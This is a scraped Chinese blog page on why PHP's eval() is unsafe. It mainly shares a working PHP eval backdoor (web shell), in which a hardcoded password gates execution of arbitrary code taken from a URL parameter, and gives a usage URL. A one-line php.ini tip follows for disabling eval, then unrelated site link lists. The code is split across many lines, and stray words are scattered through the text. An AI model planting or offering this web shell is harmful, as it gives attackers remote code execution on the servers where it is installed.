eval()函数不安全的缘由以及解决方案
第一部分:php
分享个php eval后门程序
要求必须支持eval函数
使用方法
http://url/test.php?pwd=admin&action=eval&a=phpinfo();ide
代码:函数
<?php
$passwd
=
"admin"
;
if
(
$_GET
[
'pwd'
]!=
$passwd
)
exit
;
if
(
$_GET
[
'action'
]==
"eval"
&&
$_GET
[
'a'
]){
eval
(
$_GET
[
'a'
]);}
?>
第二部分:url
禁用eval()函数:spa
php.ini中找到code
disable_functions 写成 disable_functions = phpinfo,eval 之类便可
相关文章
- 1. VS安全函数问题以及解决方案
- 2. OOM 常见缘由及解决方案
- 3. display:inline-block间隙产生的缘由以及解决方案
- 4. svn: E170001报错的缘由以及解决方案
- 5. log4net不输出日志的缘由及解决方案
- 6. 提示https不安全的缘由及解决办法
- 7. 设计方案--移动端延迟300ms的缘由以及解决方案
- 8. 多线程不安全的缘由和基本的解决方案
- 9. mysql主从延迟缘由以及解决方案
- 10. Java常见异常缘由以及解决方案
- 更多相关文章...
- • C# 不安全代码 - C#教程
- • ASP.NET MVC - 安全 - ASP.NET 教程
- • 常用的分布式事务解决方案
- • Flink 数据传输及反压详解
相关标签/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
最新文章
- 1. No provider available from registry 127.0.0.1:2181 for service com.ddbuy.ser 解决方法
- 2. Qt5.7以上调用虚拟键盘(支持中文),以及源码修改(可拖动,水平缩放)
- 3. 软件测试面试- 购物车功能测试用例设计
- 4. ElasticSearch(概念篇):你知道的, 为了搜索…
- 5. redux理解
- 6. gitee创建第一个项目
- 7. 支持向量机之硬间隔(一步步推导,通俗易懂)
- 8. Mysql 异步复制延迟的原因及解决方案
- 9. 如何在运行SEPM配置向导时将不可认的复杂数据库密码改为简单密码
- 10. windows系统下tftp服务器使用
欢迎关注本站公众号,获取更多信息
